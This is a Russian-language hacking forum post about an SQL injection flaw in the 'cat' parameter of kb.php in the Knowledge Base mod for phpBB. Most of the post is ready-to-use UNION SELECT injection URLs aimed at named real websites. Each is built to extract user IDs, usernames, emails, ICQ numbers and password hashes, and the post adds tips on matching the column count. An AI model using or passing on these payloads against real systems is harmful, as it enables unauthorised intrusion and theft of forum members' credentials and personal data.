|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Sql injection в Knowledge Base
Случайно наткнулся  В поисковиках и на ачате ничего по этому поводу не нашел. Хотя бага старая. Так что если уже было, plz, больно не пинайте
Программа: Knowledge Base (мод для phpBB)
Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "cat" в сценарии kb.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://site/kb.php?mode=cat&cat=-1[sql injection]
Принтабельно вророе поле, информация выводится в title.
От чего зависит количество полей, я хз, но попадаются скули с 6 или с 24 полями.
Примеры с 6:
Код:
http://www.startrek-gamers.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
Код:
http://crossandflame.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
Код:
http://phpbb-auction.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
Код:
http://www.teamdirection.com/phpBB2/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%202,2/*
Код:
http://www.kartonwork.pl/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
Код:
http://www.websiteforum.nl/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
Код:
http://www.brazilfw.com.br/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
Примеры с 24:
Код:
http://forum.screamer-hardstyle.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users%20limit%201,2/*
Код:
http://forum.pacan.net/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users%20limit%201,2/*
Иногда отсутствует столбец phpbb_users, тогда делаем то же, что и при нахождении обычной скули. Например:
Код:
http://www.esnsweden.org/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(name,char(58),login,char(58),pass),3,4,5,6%20from%20users%20limit%201,2/*
Воть |